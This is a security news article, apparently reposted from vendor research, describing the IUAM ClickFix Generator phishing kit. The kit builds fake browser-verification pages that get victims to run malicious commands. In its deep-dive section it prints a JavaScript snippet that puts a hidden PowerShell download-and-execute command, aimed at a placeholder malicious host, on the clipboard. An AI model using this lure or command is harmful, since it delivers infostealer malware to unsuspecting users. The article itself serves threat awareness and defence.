New Phishing Kit Automates Generation of ClickFix Attack Bypassing Security Measures


The cybersecurity community has witnessed the rapid emergence of a novel phishing toolkit that automates the creation of “ClickFix” attack pages, enabling threat actors with minimal technical expertise to deploy sophisticated social engineering lures.

Dubbed the IUAM ClickFix Generator, this phishing kit consolidates all necessary configuration options—page title, domain, verification prompts and clipboard instructions—into a web-based interface.

The result is a turnkey solution for crafting malicious pages that masquerade as legitimate browser verification challenges, tricking victims into executing commands that plant malware.

User interface for the IUAM ClickFix Generator phishing kit (Source – Palo Alto Networks)

Initially observed in early July 2025, the first samples of the ClickFix Generator surfaced on underground forums promoting phishing-as-a-service subscriptions.

Campaign reports indicate that attackers leveraged compromised domains as host environments, injecting obfuscated JavaScript into existing websites to render phishing overlays seamlessly.

These pages commonly spoof Cloudflare-style verification checks, instructing users to copy and paste commands into system consoles under the guise of proving they are human.

google

While social engineering has long been a staple of phishing, the ClickFix approach weaponizes manual user actions as the primary infection vector, bypassing automated security controls at the network and endpoint layers.

Palo Alto Networks analysts noted that despite cosmetic variations across dozens of observed domains, all phishing pages share a nearly identical HTML structure and JavaScript event handlers that intercept click events to copy malicious commands into the victim’s clipboard.

Some variants include rudimentary OS detection logic—parsing navigator.userAgent—to tailor instructions for Windows or macOS hosts, while others present uniform instructions that succeed on any desktop platform.

Real-world campaigns have delivered DeerStealer infostealer on Windows systems and the Odyssey macOS infostealer via Base64-encoded shell commands.

The operational impact of these campaigns is significant. By offloading execution to the victim’s hands, attackers evade content inspection engines and browser sandboxes that would normally block automated payload downloads.

Organizations have reported multiple incident response engagements in which victims inadvertently executed multi-stage batch or shell scripts, resulting in credential theft and persistent backdoors.

The lowered barrier to entry afforded by the ClickFix Generator threatens to expand the pool of actors capable of launching targeted phishing campaigns against enterprises and public sector targets.

Infection Mechanism Deep Dive

Under the hood, the ClickFix pages rely on a lightweight JavaScript snippet that binds a click handler to a fake CAPTCHA checkbox.

Campaign 1 – ClickFix page delivering DeerStealer (Source – Palo Alto Networks)

When a victim clicks the checkbox, the handler executes code similar to:

function onVerifyClick() {
  const cmd = "powershell -NoP -NonI -W Hidden -Exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://malicious.domain/payload.ps1')"";
  navigator.clipboard.writeText(cmd);
  showPopover("Press Win+R, paste, and hit Enter to complete verification");
}

This snippet obfuscates its contents using configurable presets—ranging from Base64 encoding to custom symbol substitution—directly in the generator’s interface.

Once copied, the victim is guided through a series of keystrokes (Win+R on Windows or Command+Space on macOS) to launch the appropriate shell, paste the malicious command, and inadvertently pull down the malware payload.

This approach sidesteps browser security warnings and content filtering by leveraging native OS dialog windows, making detection by endpoint protection platforms highly challenging.

Continuous updates to the kit’s codebase have introduced additional evasion tactics, such as dynamic generation of clipboard commands, temporary suppression of popover overlays upon failed execution attempts, and multi-domain load balancing to distribute hosting across compromised sites.

As the IUAM ClickFix Generator evolves, defenders must prioritize stringent user education and implement stringent command-execution policies at the endpoint level to mitigate this growing threat.

Follow us on Google News, LinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

googlenews



Source link

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.